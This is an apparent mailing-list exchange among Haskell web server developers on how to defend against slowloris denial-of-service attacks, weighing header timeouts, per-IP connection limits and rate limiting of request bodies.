
I don't know if Snap is doing this yet, but it is possible to just deny
partial GET/HEAD requests.
Apache is considered vulnerable to slowloris because it has a limited thread
pool. Nginx is not considered vulnerable to slowloris because it uses an
evented architecture and by default drops connections after 60 seconds that
have not been completed. Technically we say our Haskell web servers are
using threads, but they are managed by a very fast evented system. So we can
hold many unused connections open like Nginx and should not be vulnerable if
we have a timeout that cannot be tickled. This could make for an interesting
benchmark - how many slowloris connections can we take on? The code from
Kazu makes just one connection - it does not demonstrate a successful
slowloris attack, just one successful slowloris connection.
If we limit the number of connections per ip address, that means a slowloris
attack will require the coordination of thousands of nodes and make it
highly impractical. Although there may be a potential issue with proxies
(AOL at least used to do this, but I think just for GET) wanting to make
lots of connections.
---------- Forwarded message ----------
From: Gregory Collins
I think Greg's/Snap's approach of a separate timeout for the status and headers is right on the money. It should never take more than one timeout cycle to receive a full set of headers, regardless of how slow the user's connection, and given a reasonable timeout setting from the user (anything over 2 seconds should be fine I'd guess, and our default is 30 seconds).
That's fairly uncontroversial.
The bigger question is what we do about the request body. A simple approach might just be that if we receive a packet from the client which is less than a certain size (user defined, maybe 2048 bytes is a good default) it does not tickle the timeout at all. Obviously this means a malicious program could be devised to send precisely 2048 bytes per timeout cycle... but I don't think there's any way to do better than this.
This doesn't really work either. I've already posted code in this thread for what I think is the only reasonable option, which is rate limiting. The way we've implemented rate limiting is: 1) any individual data packet must arrive within N seconds (the usual timeout) 2) when you receive a packet, you compute the data rate in bytes per second -- if it's lower than X bytes/sec (where X is a policy decision left up to the user), the connection is killed 3) the logic from 2) only kicks in after Y seconds, to cover cases where the client needs to do some expensive initial setup. Y is also a policy decision.
We *have* to err on the side of allowing attacks, otherwise we'll end up with disconnecting valid requests.
I don't agree with this. Some kinds of "valid" requests are indistinguishable from attacks. You need to decide what's more important: letting some guy on a 30-kilobit packet radio connection upload a big file, or letting someone DoS your server.
In other words, here's how I'd see the timeout code working:
1. A timeout is created at the beginning of a connection, and not tickled at all until all the request headers are read in. 2. Every time X (default: 2048) bytes of the request body are read, the timeout is tickled.
Note that this is basically a crude form of rate-limiting (at X/T
bytes per second). Why not do it "properly"?
G
--
Gregory Collins